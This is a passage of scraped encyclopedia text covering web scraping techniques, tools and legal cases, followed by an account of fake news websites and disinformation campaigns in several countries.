script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
14 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Fake_news_website | Fake news websites (also referred to as hoax news websites) 1 2 are websites on the Internet that deliberately publish fake news—hoaxes, propaganda, and disinformation purporting to be real news—often using social media to drive web traffic and amplify their effect. 3 4 5 6 Unlike news satire, fake news websites deliberately seek to be perceived as legitimate and taken at face value, often for financial or political gain. 7 8 4 Such sites have promoted political falsehoods in India, 9 10 Germany, 11 12 Indonesia and the Philippines, 13 Sweden, Mexico, 14 15 Myanmar, 16 and the United States. 17 18 Many sites originate in, or are promoted by, Russia, 3 19 or North Macedonia among others. 20 21 Some media analysts have seen them as a threat to democracy. 12 In 2016, the European Parliament's Committee on Foreign Affairs passed a resolution warning that the Russian government was using "pseudo-news agencies" and Internet trolls as disinformation propaganda to weaken confidence in democratic values. 5 In 2015, the Swedish Security Service, Sweden's national security agency, issued a report concluding Russia was using fake news to inflame "splits in society" through the proliferation of propaganda. 14 Sweden's Ministry of Defence tasked its Civil Contingencies Agency with combating fake news from Russia. 14 Fraudulent news affected politics in Indonesia and the Philippines, where there was simultaneously widespread usage of social media and limited resources to check the veracity of political claims. 13 German Chancellor Angela Merkel warned of the societal impact of "fake sites, bots, trolls". 12 Fraudulent articles spread through social media during the 2016 U.S. presidential election, 17 18 and several officials within the U.S. Intelligence Community said that Russia was engaged in spreading fake news. 22 23 Computer security company FireEye concluded that Russia used social media to spread fake news stories 24 as part of a cyberwarfare campaign. 25 Google and Facebook banned fake sites from using online advertising. 26 27 Facebook launched a partnership with fact-checking websites to flag fraudulent news and hoaxes; debunking organizations that joined the initiative included: Snopes.com, FactCheck.org, and PolitiFact. 28 U.S. President Barack Obama said a disregard for facts created a "dust cloud of nonsense". 29 Chief of the Secret Intelligence Service (MI6) Alex Younger called fake news propaganda online dangerous for democratic nations. 30 The New York Times has defined "fake news" on the internet as fictitious articles deliberately fabricated to deceive readers, generally with the goal of profiting through clickbait. 31 PolitiFact has described fake news as fabricated content designed to fool readers and subsequently made viral through the Internet to crowds that increase its dissemination. 32 Others have taken as constitutive the "systemic features inherent in the design of the sources and channels through which fake news proliferates", for example by playing to the audience's cognitive biases, heuristics, and partisan affiliation. 33 Some fake news websites use website spoofing, structured to make visitors believe they are visiting trusted sources like ABC News or MSNBC. 21 Fake news maintained a presence on the internet and in tabloid journalism in the years prior to the 2016 U.S. presidential election. 31 Before the election campaign involving Hillary Clinton and Donald Trump, fake news had not impacted the election process and subsequent events to such a high degree. 31 Subsequent to the 2016 election, the issue of fake news turned into a political weapon, with supporters of left-wing politics saying that supporters of right-wing politics spread false news, while the latter claimed that they were being "censored". 31 Due to these back-and-forth complaints, the definition of fake news as used for such polemics has become more vague. 31 Unethical journalistic practices existed in printed media for hundreds of years before the advent of the Internet. 34 35 36 Yellow journalism, reporting from a standard which is devoid of integrity and professional ethics, was pervasive during the time period in history known as the Gilded Age, and unethical journalists would engage in fraud by fabricating stories, interviews, and made-up names for scholars. 35 34 During the 1890s, the spread of this unethical news sparked violence and conflicts. 34 Both Joseph Pulitzer and William Randolph Hearst fomented yellow journalism in order to increase profits, which helped lead to misunderstandings which became partially responsible for the outset of the Spanish American War in 1898. 37 J.B. Montgomery-M'Govern wrote a column harshly critical of "fake news" in 1898, saying that what characterized "fake news" was sensationalism and "the publication of articles absolutely false, which tend to mislead an ignorant or unsuspecting public. 38 A radio broadcast from Gleiwitz by German soldier Karl Hornack, pretending to be a Polish invader who had captured the station, was taken at face value by other stations, in Germany and abroad, fueling Adolf Hitler's declaration of war on Poland the next day. 39 According to USA Today, newspapers which have a history of commonly publishing fake news have included Globe, Weekly World News, and The National Enquirer. 37 Common characteristics of fake news websites, as noted by many fact-checkers and journalists, are sorted into several categories: Many fake news websites can be assessed as likely being part of the same network campaign if some combination of the following are true: Prominent among fraudulent news sites include false propaganda created by individuals in the countries of Russia, 3 5 North Macedonia, 20 21 Romania, 89 and the United States. 90 91 Much of the fake news during the 2016 U.S. presidential election season was traced to adolescents in North Macedonia, 20 92 specifically Veles. It is a town of 50,000 in the middle of the country, with high unemployment, where the average wage is $4,800. 93 The income from fake news was characterized by NBC News as a gold rush. 93 Adults supported this income, saying they were happy the youths were working. 94 The mayor of Veles, Slavcho Chadiev, said he was not bothered by their actions, as they were not against Macedonian law and their finances were taxable. 93 Chadiev said he was happy if deception from Veles influenced the results of the 2016 U.S. election in favor of Trump. 93 BuzzFeed News and The Guardian separately investigated and found teenagers in Veles created over 100 sites spreading fake news stories supportive of Donald Trump. 20 95 96 The teenagers experimented with left slanted fake stories about Bernie Sanders, but found that pro-Trump fictions were more popular. 95 Prior to the 2016 election the teenagers gained revenues from fake medical advice sites. 97 One youth named Alex stated, in an August 2016 interview with The Guardian, that this fraud would remain profitable regardless of who won the election. 20 Alex explained he plagiarized material for articles by copying and pasting from other websites. 20 This could net them thousands of dollars daily, but they averaged only a few thousand per month. 97 The Associated Press (AP) interviewed an 18 year-old in Veles about his tactics. 94 A Google Analytics analysis of his traffic showed more than 650,000 views in one week. 94 He plagiarized pro-Trump stories from a right-wing site called The Political Insider. 94 He said he did not care about politics, and published fake news to gain money and experience. 94 The AP used DomainTools to confirm the teenager was behind fake sites, and determined there were about 200 websites tracked to Veles focused on U.S. news, many of which mostly contained plagiarized legitimate news to create an appearance of credibility. 94 NBC News also interviewed an 18 year-old there. 93 Dmitri (a pseudonym) was one of the most profitable fake news operators in town, and said about 300 people in Veles wrote for fake sites. 93 Dmitri said he gained over $60,000 during the six months prior through doing this, more than both his parents' earnings. 93 Dmitri said his main dupes were supporters of Trump. 93 He said after the 2016 U.S. election he continued to earn significant amounts. 93 The 2020 U.S. election is their next project. 98 "Ending the Fed", a popular purveyor of fraudulent reports, was run by a 24 year-old named Ovidiu Drobota out of Oradea, Romania, who boasted to Inc. magazine about being more popular than mainstream media. 89 Established in March 2016, "Ending the Fed" was responsible for a false story in August 2016 that incorrectly stated Fox News had fired journalist Megyn Kelly—the story was briefly prominent on Facebook on its "Trending News" section. 89 "Ending the Fed" held four out of the 10 most popular fake articles on Facebook related to the 2016 U.S. election in the prior three months before the election itself. 89 The Facebook page for the website, called "End the Feed", had 350,000 "likes" in November 2016. 89 After being contacted by Inc. magazine, Drobota stated he was proud of the impact he had on the 2016 U.S. election in favor of his preferred candidate Donald Trump. 89 According to Alexa Internet, "Ending the Fed" garnered approximately 3.4 million views over a 30 day-period in November 2016. 89 Drobota stated the majority of incoming traffic is from Facebook. 89 He said his normal line of work before starting "Ending the Fed" included web development and search engine optimization. 89 Beginning in fall 2014, The New Yorker writer Adrian Chen performed a six-month investigation into Russian propaganda dissemination online by the Internet Research Agency (IRA). 19 Yevgeny Prigozhin (Evgeny Prigozhin), a close associate of Vladimir Putin, was behind the operation which hired hundreds of individuals to work in Saint Petersburg. 19 The organization became regarded as a "troll farm", a term used to refer to propaganda efforts controlling many accounts online with the aim of artificially providing a semblance of a grassroots organization. 19 Chen reported that Internet trolling was used by the Russian government as a tactic largely after observing the social media organization of the 2011 protests against Putin. 19 In 2015, the Organization for Security and Co-operation in Europe released an analysis critical of disinformation campaigns by Russia masked as news. 99 This was intended to interfere with Ukraine relations with Europe after the removal of former Ukraine president Viktor Yanukovych. 99 According to Deutsche Welle, similar tactics were used in the 2016 U.S. elections. 99 The European Union created a taskforce to deal with Russian disinformation. 5 99 100 The taskforce, East StratCom Team, had 11 people including Russian speakers. 101 In November 2016, the EU voted to increase the group's funding. 101 In November 2016, the European Parliament Committee on Foreign Affairs passed a resolution warning of the use by Russia of tools including: "pseudo-news agencies ... social media and internet trolls" as disinformation to weaken democratic values. 5 The resolution requested EU analysts investigate, explaining member nations needed to be wary of disinformation. 5 The resolution condemned Russian sources for publicizing "absolutely fake" news reports. 102 The tally on 23 November 2016 passed by a margin of 304 votes to 179. 102 The U.S. State Department planned to use a unit called the Counter-Disinformation Team, formed with the intention of combating disinformation from the Russian government, and that it was disbanded in September 2015 after department heads missed the scope of propaganda before the 2016 U.S. election. 103 104 The U.S. State Department put eight months into developing the unit before scrapping it. 103 It would have been a reboot of the Active Measures Working Group set up by Reagan Administration. 104 105 The Counter-Disinformation Team was set up under the Bureau of International Information Programs. 104 105 Work began in 2014, with the intention to combat propaganda from Russian sources such as the RT network (formerly known as Russia Today). 104 105 U.S. Intelligence officials explained to former National Security Agency analyst and counterintelligence officer John R. Schindler that the Obama Administration decided to cancel the unit as they were afraid of antagonizing Russia. 104 105 U.S. Undersecretary of State for Public Diplomacy Richard Stengel was point person for the unit before it was canceled. 104 105 Stengel previously wrote about disinformation by RT. 106 107 108 Adrian Chen observed a pattern in December 2015 where pro-Russian accounts became supportive of 2016 U.S. presidential candidate Donald Trump. 3 Andrew Weisburd and Foreign Policy Research Institute fellow and senior fellow at the Center for Cyber and Homeland Security at George Washington University, Clint Watts, 109 wrote for The Daily Beast in August 2016 that Russian propaganda fabricated articles were popularized by social media. 3 Weisburd and Watts documented how disinformation spread from Russia Today and Sputnik News, "the two biggest Russian state-controlled media organizations publishing in English", to pro-Russian accounts on Twitter. 3 Citing research by Chen, Weisburd and Watts compared Russian tactics during the 2016 U.S. election to Soviet Union Cold War strategies. 3 They referenced the 1992 United States Information Agency report to Congress, which warned about Russian propaganda called active measures. 3 They concluded social media made active measures easier. 3 Institute of International Relations Prague senior fellow and scholar on Russian intelligence, Mark Galeotti, agreed the Kremlin operations were a form of active measures. 22 The most strident Internet promoters of Trump were not U.S. citizens but paid Russian propagandists. The Guardian estimated their number to be in the "low thousands" in November 2016. 110 Weisburd and Watts collaborated with colleague J. M. Berger and published a follow-up to their Daily Beast article in online magazine War on the Rocks, titled: "Trolling for Trump: How Russia is Trying to Destroy Our Democracy". 109 111 112 They researched 7,000 pro-Trump accounts over a 2 1 2 year period. 111 Their research detailed trolling techniques to denigrate critics of Russian activities in Syria, and proliferate lies about Clinton's health. 111 Watts said the propaganda targeted the alt-right, the right wing, and fascist groups. 109 After each presidential debate, thousands of Twitter bots used hashtag Trumpwon to change perceptions. 113 In November 2016 the Foreign Policy Research Institute a stated Russian propaganda exacerbated criticism of Clinton and support for Trump. 17 18 The strategy involved social media, paid Internet trolls, botnets, and websites in order to denigrate Clinton. 17 18 Computer security company FireEye concluded Russia used social media as a weapon to influence the U.S. election. 25 FireEye Chairman David DeWalt said the 2016 operation was a new development in cyberwarfare by Russia. 25 FireEye CEO Kevin Mandia stated Russian cyberwarfare changed after fall 2014, from covert to overt tactics with decreased operational security. 25 Bellingcat analyst Aric Toler explained fact-checking only drew further attention to the fake news problem. 115 U.S. Intelligence agencies debated why Putin chose summer 2016 to escalate active measures. 116 Prior to the election, U.S. national security officials said they were anxious about Russia tampering with U.S. news. 113 Director of National Intelligence James R. Clapper said after the 2011 13 Russian protests, Putin lost self-confidence, and responded with the propaganda operation. 116 Former CIA officer Patrick Skinner said the goal was to spread uncertainty. 115 House Intelligence Committee Ranking Member Adam Schiff commented on Putin's aims, and said U.S. intelligence were concerned with Russian propaganda. 116 Speaking about disinformation that appeared in Hungary, Slovakia, the Czech Republic, and Poland, Schiff said there was an increase of the same behavior in the U.S. 116 U.S. intelligence officials stated in November 2016 they believed Russia engaged in spreading fake news, 22 and the FBI released a statement saying they were investigating. 22 113 Two U.S. intelligence officials each told BuzzFeed News they "believe Russia helped disseminate fake and propagandized news as part of a broader effort to influence and undermine the presidential election". 22 The U.S. intelligence sources stated this involved "dissemination of completely fake news stories". 22 They told BuzzFeed the FBI investigation specifically focused on why "Russia had engaged in spreading false or misleading information". 22 Fake news has influenced political discourse in multiple countries, including Germany, 12 Indonesia, 13 Philippines, 13 Sweden, 14 China, 117 118 Myanmar, 119 16 and the United States. 3 Politicians in Austria dealt with the impact of fake news and its spread on social media after the 2016 presidential campaign in the country. 120 In December 2016, a court in Austria issued an injunction on Facebook Europe, mandating it block negative postings related to Eva Glawischnig-Piesczek, Austrian Green Party Chairwoman. 120 According to The Washington Post the postings to Facebook about her "appeared to have been spread via a fake profile" and directed derogatory epithets towards the Austrian politician. 120 The derogatory postings were likely created by the identical fake profile that had previously been utilized to attack Alexander van der Bellen, who won the election for President of Austria. 120 Brazil faced increasing influence from fake news after the 2014 re-election of President Dilma Rousseff and Rousseff's subsequent impeachment in August 2016. 121 In the week surrounding one of the impeachment votes, 3 out of the 5 most-shared articles on Facebook in Brazil were fake. 121 In 2015, reporter Tai Nalon resigned from her position at Brazilian newspaper Folha de S.Paulo in order to start the first fact-checking website in Brazil, called Aos Fatos (To The Facts). 121 Nalon told The Guardian there was a great deal of fake news, and hesitated to compare the problem to that experienced in the U.S. 121 Fake news online was brought to the attention of Canadian politicians in November 2016, as they debated helping assist local newspapers. 122 Member of Parliament for Vancouver Centre Hedy Fry specifically discussed fake news as an example of ways in which publishers on the Internet are less accountable than print media. 122 Discussion in parliament contrasted increase of fake news online with downsizing of Canadian newspapers and the impact for democracy in Canada. 122 Representatives from Facebook Canada attended the meeting and told members of Parliament they felt it was their duty to assist individuals gather data online. 122 Fake news during the 2016 U.S. election spread to China. 121 Articles popularized within the United States were translated into Chinese and spread within China. 121 The government of China used the growing problem of fake news as a rationale for increasing Internet censorship in China in November 2016. 123 China then published an editorial in its Communist Party newspaper The Global Times called: "Western Media's Crusade Against Facebook", and criticized "unpredictable" political problems posed by freedoms enjoyed by users of Twitter, Google, and Facebook. 117 China government leaders meeting in Wuzhen at the third World Internet Conference in November 2016 said fake news in the U.S. election justified adding more curbs to free and open use of the Internet. 118 China Deputy Minister Ren Xianliang, official at the Cyberspace Administration of China, said increasing online participation led to "harmful information" and fraud. 124 Kam Chow Wong, a former Hong Kong law enforcement official and criminal justice professor at Xavier University, praised attempts in the U.S. to patrol social media. 125 The Wall Street Journal noted China's themes of Internet censorship became more relevant at the World Internet Conference due to the outgrowth of fake news. 126 Officials from 11 countries held a meeting in Helsinki in November 2016, in order to plan the formation of a center to combat disinformation cyber-warfare including spread of fake news on social media. 127 The center is planned to be located in Helsinki and include efforts from 10 countries with participation from Sweden, Germany, Finland, and the U.S. 127 Prime Minister of Finland Juha Sipil planned to deal with the center in spring 2017 with a motion before the Parliament of Finland. 127 Jori Arvonen, Deputy Secretary of State for EU Affairs, said cyberwarfare became an increased problem in 2016, and included hybrid cyber-warfare intrusions into Finland from Russia and Islamic State of Iraq and the Levant. 127 Arvonen cited examples including fake news online, disinformation, and the "little green men" of the Russo-Ukrainian War. 127 France saw an uptick in amounts of disinformation and propaganda, primarily in the midst of election cycles. 121 Le Monde fact-checking division "Les d codeurs" was headed by Samuel Laurent, who told The Guardian in December 2016 the upcoming French presidential election campaign in spring 2017 would face problems from fake news. 121 The country faced controversy regarding fake websites providing false information about abortion. 121 The government's lower parliamentary body moved forward with intentions to ban such fake sites. 121 Laurence Rossignol, women's minister for France, informed parliament though the fake sites look neutral, in actuality their intentions were specifically targeted to give women fake information. 121 During the 10 year period preceding 2016, France was witness to an increase in popularity of far-right alternative news sources called the fachosphere ("facho" referring to fascist); known as the extreme right on the Internet fr . 121 According to sociologist Antoine Bevort, citing data from Alexa Internet rankings, the most consulted political websites in France included galit et R conciliation, Fran ois Desouche fr , and Les Moutons Enrag s. 128 129 These sites increased skepticism towards mainstream media from both left and right perspectives. 121 German Chancellor Angela Merkel lamented the problem of fraudulent news reports in a November 2016 speech, days after announcing her campaign for a fourth term as leader of her country. 12 In a speech to the German parliament, Merkel was critical of such fake sites, saying they harmed political discussion. 12 Merkel called attention to the need of government to deal with Internet trolls, bots, and fake news websites. 12 She warned that such fraudulent news websites were a force increasing the power of populist extremism. 12 Merkel called fraudulent news a growing phenomenon that might need to be regulated in the future. 12 Germany's foreign intelligence agency Federal Intelligence Service Chief, Bruno Kahl de , warned of the potential for cyberattacks by Russia in the 2017 German election. 130 He said the cyberattacks would take the form of the intentional spread of disinformation. 130 Kahl said the goal is to increase chaos in political debates. 130 Germany's domestic intelligence agency Federal Office for the Protection of the Constitution Chief, Hans-Georg Maassen, said sabotage by Russian intelligence was a present threat to German information security. 130 Rasmus Kleis Nielsen, director at Reuters Institute for the Study of Journalism, thinks that "the problems of disinformation in a society like India might be more sophisticated and more challenging than they are in the West". 131 The damage caused due to fake news on social media has increased due to the growth of the internet penetration in India, which has risen from 137 million internet users in 2012 to over 600 million in 2019. 132 India is the largest market for WhatsApp, with over 230 million users, and as a result one of the main platforms on which fake news is spread. 133 134 One of the main problems is of receivers believing anything sent to them over social media due to lack of awareness. 135 Various initiatives and practices have been started and adopted to curb the spread and impact of fake news. 136 Fake news is also spread through Facebook, WhatsApp 137 and Twitter. 138 139 140 According to a report by The Guardian, the Indian media research agency CMS stated that the cause of spread of fake news was that India "lacked (a) media policy for verification". Additionally, law enforcement officers have arrested reporters and journalists for "creating fictitious articles", especially when the articles were controversial. 141 In India, fake news has been spread primarily by the right-wing political outfits. A study published in ThePrint claimed that on Twitter, there were at least 17,000 accounts spreading fake news to favour the BJP, while around 147 accounts were spreading fake news to favour the Indian National Congress. 142 Similarly, the IT Cell of the BJP has been accused of spreading fake news against the party's political opponents, religious minorities, and any campaigns against the party. 143 144 137 The IT Cells of the BJP, Congress and other political parties have been accused of spreading fake news against the party's political opponents and any campaigns against the party. 145 The RSS mouthpiece Organizer has also been accused of misleading reports. 146 147 Prominent fake news-spreading websites and online resources include OpIndia 158 , TFIPost (previously, The Frustrated Indian) and Postcard News. 159 160 Fraudulent news has been particularly problematic in Indonesia and the Philippines, where social media has an outsized political influence. 13 According to media analysts, developing countries with new access to social media and democracy felt the fake news problem to a larger extent. 13 In some developing countries, Facebook gives away smartphone data free of charge for Facebook and media sources, but at the same time does not provide the user with Internet access to fact-checking websites. 13 On 8 October 2020, Bloomberg reported that 92 websites used by Iran to spread misinformation were seized by the United States government. 161 162 Between 1 October and 30 November 2016, ahead of the Italian constitutional referendum, five out of ten referendum-related stories with most social media participation were hoaxes or inaccurate. 164 165 Of the three stories with the most social media attention, two were fake. 165 Prime Minister of Italy Matteo Renzi met with U.S. President Obama and leaders of Europe at a meeting in Berlin, Germany in November 2016, and spoke about the fake news problem. 163 Renzi hosted discussions on Facebook Live in an effort to rebut falsities online. 164 The influence became so heavy that a senior adviser to Renzi began a defamation complaint on an anonymous Twitter user who had used the screenname "Beatrice di Maio". 121 The Five Star Movement (M5S), an Italian political party founded by Beppe Grillo, managed fake news sites amplifying support for Russian news, propaganda, and inflamed conspiracy theories. 163 166 The party's site TzeTze had 1.2 million Facebook fans and shared fake news and pieces supportive of Putin cited to Russia-owned sources including Sputnik News. 166 TzeTze plagiarized the Russian sources, and copied article titles and content from Sputnik. 167 TzeTze, another site critical of Renzi called La Cosa, and a blog by Grillo—were managed by the company Casaleggio Associati which was started by Five Star Movement co-founder Gianroberto Casaleggio. 166 Casaleggio's son Davide Casaleggio owns and manages TzeTze and La Cosa, and medical advice website La Fucina which markets anti-vaccine conspiracy theories and medical cure-all methods. 167 Grillo's blog, Five Star Movement fake sites use the same IP addresses, Google Analytics and Google AdSense. 167 Cyberwarfare against Renzi increased, and Italian newspaper La Stampa brought attention to false stories by Russia Today which wrongly asserted a pro-Renzi rally in Rome was actually an anti-Renzi rally. 121 In October 2016, the Five Star Movement disseminated a video from Kremlin-aligned Russia Today which falsely reported displaying thousands of individuals protesting the 4 December 2016 scheduled referendum in Italy—when in fact the video that went on to 1.5 million views showed supporters of the referendum. 166 167 President of the Italian Chamber of Deputies, Laura Boldrini, stated: "Fake news is a critical issue and we can't ignore it. We have to act now. 163 Boldrini met on 30 November 2016 with vice president of public policy in Europe for Facebook Richard Allan to voice concerns about fake news. 163 She said Facebook needed to admit they were a media company. 163 In 2022 the renowned Italian magazine Panorama brought attention to fake news published by the website "Open di Enrico Mentana" which repeatedly reported a number of false stories with regard to the Russo-Ukrainian war. 168 These fake news were eventually rejected by Alina Dubovksa, journalist of the Ukrainian newspaper Public, also due to the lack of evidences, by Catalina Marchant de Abreu, journalist of France 24, due to unfoundedness of the stories, as well as by Oleksiy Mykolaiovych Arestovych, an Adviser to the Head of the Office of the President of Ukraine Volodymyr Zelenskyy. 168 Elections in Mexico are always rigged by the misinformation that is let out in the public. This is true for any political party, whether they are democratic or authoritarian. Due to the false information that easily influences voters in Mexico, it can threaten that state of the country because actions that are taken by misinformed citizens. In Mexico, fake exit polls have been moving within digital media outlets. What this means is that citizens are not receiving real data on what is happening in their elections. 169 Amid the 2018 local elections in Moldova a doctored video with mistranslated subtitles purported to show that the a pro-Europe party candidate for mayor of Chi in u (pop. 685,900), the capital of Moldova had proposed to lease the city of Chi in u to the UAE for 50 years. 170 The video was watched more than 300,000 times on Facebook and almost 250,000 times on the Russian social network site OK.ru, which is popular among Moldova's Russian-speaking population. 170 In 2015, fake stories using unrelated photographs and fraudulent captions were shared online in support of the Rohingya. 171 Fake news negatively affected individuals in Myanmar, leading to a rise in violence against Muslims in the country. 119 16 Online participation surged from one percent to 20 percent of Myanmar's total populace from 